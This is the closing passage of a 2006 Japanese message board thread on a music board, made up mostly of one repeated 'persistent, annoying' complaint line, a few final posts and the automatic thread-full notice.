シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

998 :NO MUSIC NO NAME:2006/09/18(月) 01:20:19 ID:1/ZNA0TC
みゃおー

999 :NO MUSIC NO NAME:2006/09/18(月) 01:20:50 ID:Qaxn1+K/
シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

1000 :NO MUSIC NO NAME:2006/09/18(月) 01:20:56 ID:evm1qwmg
1000なら、次スレなし!

1001 :1001:Over 1000 Thread
このスレッドは1000を超えました。
もう書けないので、新しいスレッドを立ててくださいです。。。

446 KB
★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)